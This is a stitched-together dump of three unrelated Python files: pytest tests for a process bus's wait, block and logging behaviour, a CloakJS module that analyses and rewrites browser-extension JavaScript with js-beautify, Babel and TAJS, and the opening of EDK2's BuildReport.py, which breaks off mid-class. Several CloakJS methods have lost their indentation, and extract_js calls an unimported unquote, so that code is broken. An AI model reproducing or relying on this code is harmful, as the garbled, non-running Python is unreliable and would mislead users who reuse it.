        ('start', [bus.states.STARTING, bus.states.STARTED]),
        ('exit', [bus.states.EXITING]),
    ]
    for method, states in flow:
        threading.Thread(target=f, args=(method,)).start()
        bus.wait(states)
        # The wait method MUST wait for the given state(s).
        assert bus.state in states, 'State %r not in %r' % (bus.state, states)
@pytest.mark.xfail(CI_ON_MACOS, reason='continuous integration on macOS fails')
def test_wait_publishes_periodically(bus):
    """Test that wait publishes each tick."""
    callback = unittest.mock.MagicMock()
    bus.subscribe('main', callback)
    def set_start():
        # Start the bus shortly after wait() begins polling.
        time.sleep(0.05)
        bus.start()
    threading.Thread(target=set_start).start()
    # Poll every 0.01s, publishing on 'main' each tick until STARTED.
    bus.wait(bus.states.STARTED, interval=0.01, channel='main')
    # ~0.05s of 0.01s ticks should have published several times.
    assert callback.call_count > 3
def test_block(bus, log_tracker):
    """Test that bus block waits for exiting."""
    def f():  # pylint: disable=invalid-name
        # Exit the bus from a worker thread while block() is waiting.
        time.sleep(0.2)
        bus.exit()
    def g():  # pylint: disable=invalid-name
        # A second non-daemon thread that block() must also wait out.
        time.sleep(0.4)
    threading.Thread(target=f).start()
    threading.Thread(target=g).start()
    threads = [t for t in threading.enumerate() if not t.daemon]
    # Main thread plus f and g.
    assert len(threads) == 3
    bus.block()
    # The block method MUST wait for the EXITING state.
    assert bus.state == bus.states.EXITING
    # The block method MUST wait for ALL non-main, non-daemon threads to
    # finish.
    threads = [t for t in threading.enumerate() if not t.daemon]
    assert len(threads) == 1
    # The last message will mention an indeterminable thread name; ignore
    # it
    expected_bus_messages = [
        'Bus STOPPING',
        'Bus STOPPED',
        'Bus EXITING',
        'Bus EXITED',
        'Waiting for child threads to terminate...',
    ]
    bus_msg_num = len(expected_bus_messages)
    # If the last message mentions an indeterminable thread name then ignore it
    assert log_tracker.log_entries[:bus_msg_num] == expected_bus_messages
    assert len(log_tracker.log_entries[bus_msg_num:]) <= 1, (
        'No more than one extra log line with the thread name expected'
    )
def test_start_with_callback(bus):
    """Test that callback fires on bus start."""
    try:
        events = []
        def f(*args, **kwargs):  # pylint: disable=invalid-name
            # The callback records its own invocation with its arguments.
            events.append(('f', args, kwargs))
        def g():  # pylint: disable=invalid-name
            # A regular 'start' listener, expected to run before the callback.
            events.append('g')
        bus.subscribe('start', g)
        bus.start_with_callback(f, (1, 3, 5), {'foo': 'bar'})
        # Give wait() time to run f()
        time.sleep(0.2)
        # The callback method MUST wait for the STARTED state.
        assert bus.state == bus.states.STARTED
        # The callback method MUST run after all start methods.
        assert events == ['g', ('f', (1, 3, 5), {'foo': 'bar'})]
    finally:
        # Exit so the atexit handler doesn't complain.
        bus.exit()
def test_log(bus, log_tracker):
    """Test that bus messages and errors are logged."""
    assert log_tracker.log_entries == []
    # Try a normal message.
    expected = []
    for msg_ in ["O mah darlin'"] * 3 + ['Clementiiiiiiiine']:
        bus.log(msg_)
        expected.append(msg_)
    assert log_tracker.log_entries == expected
    # Try an error message
    try:
        # Deliberately reference an undefined name to raise NameError.
        foo
    except NameError:
        bus.log('You are lost and gone forever', traceback=True)
        lastmsg = log_tracker.log_entries[-1]
        # With traceback=True, the logged text must embed the traceback.
        assert 'Traceback' in lastmsg and 'NameError' in lastmsg, (
            'Last log message %r did not contain '
            'the expected traceback.' % lastmsg
        )
    else:
        pytest.fail('NameError was not raised as expected.')
|
CloakJS.py | import sys
from os.path import isfile, isdir, join, abspath, splitext, basename, exists, dirname, relpath
from os import makedirs, remove as removefile
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue, Empty
from cloakx import Extension
from cloakx.CloakBase import CloakBase
from cloakx.CloakHTML import CloakHTML
import cssutils
import re
from bs4 import BeautifulSoup
from logging import CRITICAL as CRITICAL_LOG_LEVEL
from cloakx.utils import multi_open
from urllib.parse import urlencode, quote_plus
from time import sleep
from shutil import rmtree
import distutils
from distutils import dir_util
# from slimit import ast
# from slimit.parser import Parser
# from slimit.visitors import nodevisitor
# from esprima import parseScript
from pprint import PrettyPrinter
from collections import defaultdict
import json
import pprint
from shutil import copyfile
import hashlib
# Skeleton used to wrap generated <script> tags into a loadable page.
HTML_TEMPLATE_HEAD = "<html><body>\n"
HTML_TEMPLATE_TAIL = "</body></html>\n"
# Output directory name for the generated per-extension .html/.data files.
CEX_HTML_DIR = "cex_html"
# Path to the TAJS analyzer jar, relative to the working directory.
TAJS_LOC = join("..", "tajs-all.jar")
# Scratch directory next to this module (re-created by build_unified_html).
TEMP_DIR = join(dirname(__file__),"temp")
# Shared pretty-printer for dumping result dictionaries.
pp = PrettyPrinter(indent=2)
class CloakJS(CloakBase):
    @staticmethod
    def fn_filter(fn):
        # True for paths that name an existing .js file on disk.
        return fn.endswith('.js') and isfile(fn)
    def __init__(self, extension):
        """Wrap *extension* for JS analysis.

        Compiles the identifier regex and silences cssutils logging.
        """
        super().__init__()
        self.ext = extension  # type: Extension
        # NOTE(review): self.ident_pattern is presumably provided by
        # CloakBase -- confirm, it is not defined in this class.
        self.variable_regex = re.compile(self.ident_pattern, re.IGNORECASE)
        # cssutils is chatty; only surface critical problems.
        cssutils.log.setLevel(CRITICAL_LOG_LEVEL)
        # Cached list of the extension's .js files (filled by build_unified_html).
        self._js_fns = []
    def clean_up_js(self):
        """Beautify the extension's JS files and transpile them to ES2015.

        NOTE(review): the first statement raises unconditionally, so every
        line after it is unreachable dead code (kept for reference).
        """
        raise Exception("-- clean_up_js is deprecated")
        print("Beautifying")
        processlist = []
        # Launch one js-beautify process per file, in parallel.
        for bfile in self._js_fns:
            cmd = ["js-beautify", "--replace", bfile]
            proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
            # print(cmd)
            processlist.append(proc)
        # Wait for all of them; abort the whole run on any failure.
        for proc in processlist:
            proc.wait()
            stdout, stderr = proc.communicate()
            if proc.returncode != 0:
                print("!!!! beautification failed???? ")
                print(stdout)
                print(stderr)
                exit(1283)
        print("Beautification completed...")
        print("Converting to ES2015")
        cmd = ['npx', 'babel-cli', '--plugins', 'transform-object-rest-spread', '--presets=es2015-without-strict', self.ext.get_path,
               '--out-file', 'temp-babel.js']
        print(cmd)
        proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
        stdout, stderr = proc.communicate()
        if proc.returncode != 0:
            # Record the babel failure against this extension's results.
            print(stdout)
            self.ext.write_to_results("b")
        else:
            # Copy the transpiled tree back over the extension sources.
            distutils.dir_util.copy_tree(TEMP_DIR + "/", self.ext.get_path)
        print("Conversion completed...")
def build_unified_html(self):
if exists(TEMP_DIR):
rmtree(TEMP_DIR)
makedirs(TEMP_DIR)
self._js_fns = self.ext.get_filtered_filenames(CloakJS.fn_filter)
self.clean_up_js()
script_tags = ""
for fn in self._js_fns:
good_fn = quote_plus(join("..", relpath(fn)))
print (good_fn)
script_tags = script_tags + "\t<script src='%s'></script>\n" % good_fn
# todo: replace with write out to file
# write new css out to file
# with open('style_new.css', 'wb') as f:
# f.write(parser.cssText)
self.htmlfn = join(dirname(__file__), CEX_HTML_DIR, self.ext.getappid() + ".html")
self.datafn = join(dirname(__file__), CEX_HTML_DIR, self.ext.getappid() + ".data")
htmlout = HTML_TEMPLATE_HEAD + script_tags + HTML_TEMPLATE_TAIL
open(self.htmlfn, "w+").write(htmlout)
def easy_find(self, id_map):
found = False
# problem, we want all the times
varpattern = re.compile("(^[.]?[ ])")
h = "[0-9a-f]"
unicode = "\\\\{h}{1,6}(\\r\\n|[ \\t\\r\\n\\f])?".replace("{h}", h)
escape = "({unicode}|\\\\[^\\r\\n\\f0-9a-f])".replace("{unicode}", unicode)
nonascii = "[\\240-\\377]"
nmchar = "([_A-Za-z0-9-]|{nonascii}|{escape})".replace("{nonascii}", nonascii).replace("{escape}", escape)
nmstart = "([_A-Za-z]|{nonascii}|{escape})".replace("{nonascii}", nonascii).replace("{escape}", escape)
ident = "-?{nmstart}{nmchar}*".replace("{nmstart}", nmstart).replace("{nmchar}", nmchar)
varpattern = re.compile(ident)
def find_vals(file_to_parse, strs_to_find):
print ("strs_to_find" + str(strs_to_find))
# returns file_cnt {'foundvar': [col1, col2, etc] }
file_cnts = {}
# print("var " + node.identifier.value + " value to >> " + node.initializer.value + " <<")
for line_index, line in enumerate(file_to_parse, 1):
for match_obj in varpattern.finditer(line):
# find all id values in file and check agaisnt strs_to_find, if found then append to list for var
if match_obj.group() in strs_to_find:
var_found = match_obj.group()
if var_found in file_cnts:
file_cnts[match_obj.group()].append(line_index)
else:
file_cnts[match_obj.group()] = [line_index]
#print (str(line_index) + " " + match_obj.group())
return file_cnts
all_cnts = {}
for fn in self._js_fns:
vars_found = find_vals(open(fn), id_map)
if vars_found:
all_cnts[fn] = vars_found
if all_cnts:
pp.pprint(all_cnts)
json.dump(all_cnts, open(self.datafn, "w+"))
return all_cnts
# if False:
# try:
# jsdata=""
# tree = parseScript(jsdata)
#
# #tree = parser.parse(jsdata)
#
# for node in nodevisitor.visit(tree):
#
# cnt = 0
# if isinstance(node, ast.VarDecl):
#
# if node.initializer is not None and type(node.initializer) is ast.String:
# cnt = find_vals(node.identifier.value, id_map)
# if cnt > 0:
# all_cnts[node.identifier.value] += cnt
# found = True
# print ("var " + node.identifier.value + ' = ' + node.initializer.value + " cnt=%d"%cnt )
#
# if isinstance(node, ast.Assign):
# if type(node.right) is ast.String:
# cnt = find_vals(node.right.value, id_map)
# if cnt > 0:
# all_cnts[node.right.value] += cnt
# found = True
# print("var " + node.left.value + " = " + node.right.value + " " + " cnt=%d" % cnt)
# #node.right.value = match_replace(node.right.value, str_to_find, replace)
#
# if type(node) is ast.String:
# cnt = find_vals(node.value, id_map)
# if cnt > 0:
# all_cnts[node.value] += cnt
# found = True
# print("var " + node.value + " = " + " <<" + " cnt=%d" % cnt )
#
# #print(str(type(node)) + " " + str(vars(node)))
#
# except SyntaxError as ser:
# print (ser)
# exit(929)
# #parse Failed
#
# return all_cnts
# # print (ex)
#print(tree.to_ecma())
def extract_js(self,data):
script_out = ""
data = unquote(data)
data = data.replace("<script", "</script><script")
data += "</script>"
soup = BeautifulSoup(data, 'html.parser')
for script in soup.find_all("script"):
hasSource = False
if script.has_attr("src") and script['src'] is not None:
hasSource = True
# print("SCRIPT!!!{}".format(script))
if script.text is not None and len(script.text) > 5:
script_out += script.text + "\n"
script_out = script_out.replace("!!empty!!", "")
if len(script_out) > 5 and hasSource:
print(data)
if len(script_out.replace("\n", "").strip()) > 5:
return script_out
else:
return ""
def prepare_js(self):
#print("Beautifying")
cmd = ["js-beautify", "--replace", "temp.js"]
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
# print(cmd)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
print(stdout)
print(stderr)
return {"Error:": "Beautification FAILED", "output": repr(stdout), "err": repr(stderr)}
#print("Beautification completed...")
#print("Converting to ES2015")
cmd = ['./node_modules/.bin/babel', '--plugins', 'transform-object-rest-spread', '--presets=es2015-without-strict', "temp.js",
'--out-file', 'temp_converted.js']
#print(cmd)
try:
pass
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
return {"Error:": "Babel failed to convert ", "output": repr(stdout)}
copyfile("temp_converted.js", "temp.js")
removefile("temp_converted.js")
except Exception as err:
return {"Error:": "Babel failed to convert ", "output": repr(stdout)}
#print("Conversion completed...")
return {"msg": "Preparation of JS completed successfully"}
    def analyze_js(self, search_str, js_fn):
        """Run the TAJS static analyzer over "temp.js", searching for the
        comma-separated identifiers in search_str.

        js_fn is only used for labeling errors/results.  Returns the parsed
        temp.js.json results dict on success, or a dict with an "error" key
        (timeout, TAJS failure, or no output produced).
        """
        # Remove stale results so an old run's output is never mistaken for this one.
        if exists("temp.js.json"):
            removefile("temp.js.json")
        TAJS_LOC = "../tajs-most.jar"
        # `timeout 450` bounds the analysis; the flags relax soundness so TAJS
        # terminates on real-world extension code.
        cmd = ["timeout", "450", "java", "-Xmx8128M", "-jar", TAJS_LOC, "temp.js",
               "-ignore-if", "-analysis-limitations-warn-only", "-propagate-dead-flow",
               "-dom", "-uneval", "-determinacy", "-no-polymorphic",
               "-no-messages", "-quiet", "-memory-usage", "-console-model", "-timing",
               "-ignore-unreachable", "-no-object-sensitivity", "-no-control-sensitivity",
               "-searchFor", search_str, "-searchType", "ID",
               "-unsound", "-ignore-missing-native-models"]
        #print("Executing Cmd {}".format(cmd))
        proc = Popen(cmd, stdout=PIPE, stderr=PIPE, bufsize=1)
        parsed = ""
        stdout, stderr = proc.communicate()
        # print (stdout)
        if proc.returncode != 0:
            str_stdout = ""
            rtn_msg = {}
            # `timeout` exits with 124 when the time limit was hit.
            if proc.returncode == 124:
                error_msg = self.ext.getappid() + "|" + js_fn + "|Timedout processing JS file"
                rtn_msg = {"error": "Timeout", "error_fn": js_fn, "cmd_search_str": search_str}
            else:
                # Truncate large outputs to the first/last 100 bytes for the log.
                if len(stdout) > 200:
                    str_stdout = repr(stdout[0:100]) + "..." + repr(stdout[-100:])
                else:
                    str_stdout = repr(stdout[0:100])
                error_msg = self.ext.getappid() + "|" + js_fn + "|OUT:" + "|ERR:" + repr(stderr)
                rtn_msg = {"error": "TAJS processing error", "error_fn": js_fn, "cmd_search_str": search_str,
                           "stdout": repr(str_stdout),
                           "stderr": repr(stderr)}
            # Append to the shared error log for later triage.
            open("data/errors", "a").write(error_msg)
            print(str_stdout)
            print(stderr)
            return rtn_msg
        else:
            # TAJS writes its findings next to the input as temp.js.json.
            if exists("temp.js.json"):
                with open("temp.js.json","r") as jf:
                    tajs_results = json.load(jf)
                tajs_results["cmd_search_str"] = search_str
                return tajs_results
            else:
                print(stdout)
                print(stderr)
                return {"error": "No Results from TAJS", "stdout": repr(stdout[0:100] + "..." + stdout[-100:]),
                        "stderr": repr(stderr),
                        "cmd_search_str": search_str}
        # exit(85)
def get_json(self, json_path):
results = {}
with open(json_path, "r") as jf:
results = json.load(jf)
return results
    def cloak_dropped_inline_scripts(self, droplets, id_map):
        """Analyze and rewrite inline scripts captured at runtime ("droplets").

        Each droplet is a dict with "script" (JS text) and "hash" keys.  For
        each one: write it to temp.js, beautify/transpile, run TAJS, and, if
        search results exist, apply id_map replacements.  Returns a list of
        per-droplet result dicts.
        """
        # TAJS takes the identifiers to look for as one comma-separated string.
        search_str = ",".join(list(id_map.keys()))
        #print("SEARCH_STR={}".format(search_str))
        cloak_results = []
        for source_data in droplets:
            js = source_data["script"]
            hashvalue = source_data["hash"]
            print("\tProcessing Inline JS from Droplet {} with hash {}".format(len(js), hashvalue))
            # Stage the droplet in the shared working file used by prepare_js/analyze_js.
            open("temp.js", "w").write(js)
            prep_results=self.prepare_js()
            #print(open("temp.js", "r").read())
            # md5 = hashlib.md5()
            # md5.update(js.encode("utf-8"))
            # hashvalue = md5.hexdigest()
            #print("hashvalue={}".format(hashvalue))
            js_fn = "droplet_" + hashvalue
            analysis_results = self.analyze_js(search_str, js_fn)
            analysis_results["prepare_js"] = prep_results
            analysis_results["filename"] = js_fn
            # No temp.js.json means TAJS produced no search results for this droplet.
            if not exists("temp.js.json"):
                cloak_results.append(analysis_results)
                continue
            js_str, edited_lines = self.do_replacements(js, id_map)
            analysis_results["edited_lines"] = len(edited_lines)
            analysis_results["new_js"] = js_str
            analysis_results["old_js"] = js
            # Only tag the result with the droplet hash when something changed.
            if len(edited_lines) > 0:
                analysis_results["hash"] = hashvalue
            cloak_results.append(analysis_results)
        return cloak_results
    def cloak_dropped_wars(self, wars, id_map):
        """Analyze and rewrite on-disk extension JS files ("wars").

        For each relative path in wars: skip files already marked "//Cloaked",
        otherwise stage them in temp.js, beautify/transpile, run TAJS, apply
        id_map replacements, and write edited files back with a "//Cloaked"
        marker.  Returns a list of per-file result dicts.
        """
        e = self.ext # type: Extension
        search_str = ",".join(list(id_map.keys()))
        cloak_results = []
        for war_fn in wars:
            src_js_fn = e.get_path + war_fn
            print("\tProcessing {} of size {}".format(src_js_fn, len(src_js_fn)))
            # The "//Cloaked" marker makes this pass idempotent across runs.
            if open(src_js_fn).read().find("//Cloaked") > -1:
                print("\tSkipping already cloaked js file {}".format(e.get_path + war_fn))
                continue
            copyfile(src_js_fn, "temp.js")
            prep_results = self.prepare_js()
            analysis_results = self.analyze_js(search_str, src_js_fn)
            analysis_results["filename"] = src_js_fn
            analysis_results["prepare_js"] = prep_results
            # No temp.js.json means TAJS produced no search results for this file.
            if not exists("temp.js.json"):
                cloak_results.append(analysis_results)
                # self.ext.write_to_results(key_name, analysis_results, False)
                continue
            js = open("temp.js", "r").read()
            js_str, edited_lines = self.do_replacements(js, id_map)
            analysis_results["edited_lines"] = len(edited_lines)
            # self.ext.write_to_results(key_name, analysis_results, False)
            cloak_results.append(analysis_results)
            if len(edited_lines) > 0:
                # Prepend the marker and an audit line, then copy back over the original.
                jout = open("temp.js", "w")
                jout.write("//Cloaked")
                jout.write("//Edited line(s) {}\n".format(" ".join(str(x) for x in edited_lines)))
                jout.write(js_str + "\n")
                jout.close()
                copyfile("temp.js", e.get_path + war_fn)
        return cloak_results
def do_replacements(self, js_, id_map):
edited_lines = []
with open("temp.js.json", "r") as jf:
search_results = json.load(jf)
#print("\nSearch Res={}:".format(search_results))
js_lines = []
if "matches" in search_results:
js_lines = open("temp.js", "r").read().split("\n")
for sr_k, res in search_results["matches"].items():
#print("{} == {}".format(sr_k, res))
for ev in res:
line_no = ev['lineNumber'] - 1
if line_no < len(js_lines):
the_line = js_lines[line_no]
if sr_k[1:] in the_line:
the_line = the_line.replace(sr_k[1:], id_map[sr_k])
js_lines[line_no] = the_line
edited_lines.append(line_no)
else:
with open("data/line_not_written.json","a") as jf:
json.dump({"results":ev, "line": js_lines[line_no], "appid": self.ext.getappid()})
return "\n".join(js_lines), edited_lines
class NonBlockingStreamReader:
    """Read a stream on a background thread so callers can poll for output
    without blocking (typically a subprocess stdout/stderr pipe)."""

    def __init__(self, stream):
        '''
        stream: the stream to read from.
        Usually a process' stdout or stderr.
        '''
        self._s = stream
        self._q = Queue()
        self._finished = False

        def _populateQueue(stream, queue):
            '''
            Collect characters from 'stream' and put them in 'queue'
            until the stream ends or errors.
            '''
            while True:
                try:
                    char = stream.read(1)
                    if char:
                        queue.put(char)
                    else:
                        # EOF: mark finished and STOP.  The original looped
                        # forever here, busy-spinning on the exhausted stream.
                        self._finished = True
                        break
                except ValueError as ve:
                    print("error reading from stream")
                    print(ve)
                    self._finished = True
                    break

        self._t = Thread(target=_populateQueue, args=(self._s, self._q))
        self._t.daemon = True
        self._t.start()  # start collecting characters from the stream

    @property
    def is_finished(self):
        # True once the reader thread has seen EOF or a read error.
        return self._finished

    def read(self, timeout=None):
        """Return the next buffered character, or None if nothing is available.

        Drains data already queued even after EOF (the original dropped any
        queued characters once _finished was set).  When `timeout` is given,
        blocks up to that many seconds for new data.
        """
        try:
            return self._q.get_nowait()
        except Empty:
            if self._finished:
                return None
        try:
            return self._q.get(block=timeout is not None, timeout=timeout)
        except Empty:
            return None
class UnexpectedEndOfStream(Exception):
    """Signals that a monitored stream ended before its reader expected.

    Currently unused: the raise site in NonBlockingStreamReader is commented out.
    """
    pass
|
BuildReport.py | ## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Import Modules
#
import edk2basetools.Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from edk2basetools.Common import EdkLogger
from edk2basetools.Common.Misc import SaveFileOnChange
from edk2basetools.Common.Misc import GuidStructureByteArrayToGuidString
from edk2basetools.Common.Misc import GuidStructureStringToGuidString
from edk2basetools.Common.BuildToolError import FILE_WRITE_FAILURE
from edk2basetools.Common.BuildToolError import CODE_ERROR
from edk2basetools.Common.BuildToolError import COMMAND_FAILURE
from edk2basetools.Common.BuildToolError import FORMAT_INVALID
from edk2basetools.Common.LongFilePathSupport import OpenLongFilePath as open
from edk2basetools.Common.MultipleWorkspace import MultipleWorkspace as mws
import edk2basetools.Common.GlobalData as GlobalData
from edk2basetools.AutoGen.ModuleAutoGen import ModuleAutoGen
from edk2basetools.Common.Misc import PathClass
from edk2basetools.Common.StringUtils import NormPath
from edk2basetools.Common.DataType import *
import collections
from edk2basetools.Common.Expression import *
from edk2basetools.GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file.
#  %(Address)s is a placeholder filled in below via %-substitution before compiling.
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s,\s*Type=\w+\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report (also sizes the section separators below)
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
    TAB_PCDS_FIXED_AT_BUILD     : ('FIXED',  TAB_PCDS_FIXED_AT_BUILD),
    TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH',  TAB_PCDS_PATCHABLE_IN_MODULE),
    TAB_PCDS_FEATURE_FLAG       : ('FLAG',   TAB_PCDS_FEATURE_FLAG),
    TAB_PCDS_DYNAMIC            : ('DYN',    TAB_PCDS_DYNAMIC),
    TAB_PCDS_DYNAMIC_HII        : ('DYNHII', TAB_PCDS_DYNAMIC),
    TAB_PCDS_DYNAMIC_VPD        : ('DYNVPD', TAB_PCDS_DYNAMIC),
    TAB_PCDS_DYNAMIC_EX         : ('DEX',    TAB_PCDS_DYNAMIC_EX),
    TAB_PCDS_DYNAMIC_EX_HII     : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
    TAB_PCDS_DYNAMIC_EX_VPD     : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
    }
## The look up table to map module type to driver type
gDriverTypeMap = {
    SUP_MODULE_SEC               : '0x3 (SECURITY_CORE)',
    SUP_MODULE_PEI_CORE          : '0x4 (PEI_CORE)',
    SUP_MODULE_PEIM              : '0x6 (PEIM)',
    SUP_MODULE_DXE_CORE          : '0x5 (DXE_CORE)',
    SUP_MODULE_DXE_DRIVER        : '0x7 (DRIVER)',
    SUP_MODULE_DXE_SAL_DRIVER    : '0x7 (DRIVER)',
    SUP_MODULE_DXE_SMM_DRIVER    : '0x7 (DRIVER)',
    SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
    SUP_MODULE_UEFI_DRIVER       : '0x7 (DRIVER)',
    SUP_MODULE_UEFI_APPLICATION  : '0x9 (APPLICATION)',
    SUP_MODULE_SMM_CORE          : '0xD (SMM_CORE)',
    'SMM_DRIVER'                 : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
    SUP_MODULE_MM_STANDALONE     : '0xE (MM_STANDALONE)',
    SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
    }
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
    """Append String (plus the report end-of-line) to the report buffer File.

    File is a list acting as the report line buffer.  When Wrapper is True
    the string is re-wrapped at 120 columns for readability.
    """
    text = textwrap.fill(String, 120) if Wrapper else String
    File.append(text + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}') and not Value.startswith("{CODE("):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
    """Scan a source file for #include statements and record every header
    that can be resolved against the include path list.

    Results are added to IncludeFiles in place, keyed by the normalized
    lower-case path (with forward slashes).
    """
    FileContents = open(Source).read()

    def _Record(FileName, SearchDirs):
        # Store the header from the first directory where it actually exists.
        for Dir in SearchDirs:
            FullFileName = os.path.normpath(os.path.join(Dir, FileName))
            if os.path.exists(FullFileName):
                IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
                return

    #
    # Plain #include "X.h" / <X.h> — search the source's own directory first.
    #
    for Match in gIncludePattern.finditer(FileContents):
        _Record(Match.group(1).strip(), [os.path.dirname(Source)] + IncludePathList)
    #
    # EDK-style #include EFI_XXX_YYY(Key) macros mapped onto the header layout.
    #
    for Match in gIncludePattern2.finditer(FileContents):
        Key = Match.group(2)
        Type = Match.group(1)
        if "ARCH_PROTOCOL" in Type:
            FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
        elif "PROTOCOL" in Type:
            FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
        elif "PPI" in Type:
            FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
        elif TAB_GUID in Type:
            FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
        else:
            continue
        _Record(FileName, IncludePathList)
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
    """Re-wrap Content so no line exceeds MaxLength characters.

    Lines are preferentially broken at the right-most space, '/' or '\\\\'
    before the limit, otherwise hard-broken at MaxLength.  Returns the
    re-joined text normalized to the report's end-of-line convention.
    """
    Wrapped = []
    for Line in Content.split(TAB_LINE_BREAK):
        while len(Line.rstrip()) > MaxLength:
            # Pick the right-most natural break point inside the limit.
            BreakAt = max(Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength),
                          Line.rfind(TAB_SLASH, 0, MaxLength),
                          Line.rfind(TAB_BACK_SLASH, 0, MaxLength))
            if BreakAt <= 0:
                BreakAt = MaxLength
            Wrapped.append(Line[:BreakAt])
            Line = Line[BreakAt:]
        if Line:
            Wrapped.append(Line)
    NewContent = ''.join(NewLine + TAB_LINE_BREAK for NewLine in Wrapped)
    return NewContent.replace(gEndOfLine, TAB_LINE_BREAK).replace('\r\r\n', gEndOfLine)
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
    """Parses binary dependency expression (.depex) sections, translating
    GUID values back into the readable names declared in the workspace."""

    def __init__(self, Wa):
        """Collect a GUID-value -> name database from every package and
        module in the workspace autogen object Wa."""
        self._GuidDb = {}
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                # Protocols, PPIs and GUIDs all feed one flat value->name map.
                for GuidDecls in (Package.Protocols, Package.Ppis, Package.Guids):
                    for Name in GuidDecls:
                        GuidValue = GuidStructureStringToGuidString(GuidDecls[Name])
                        self._GuidDb[GuidValue.upper()] = Name
            for Ma in Pa.ModuleAutoGenList:
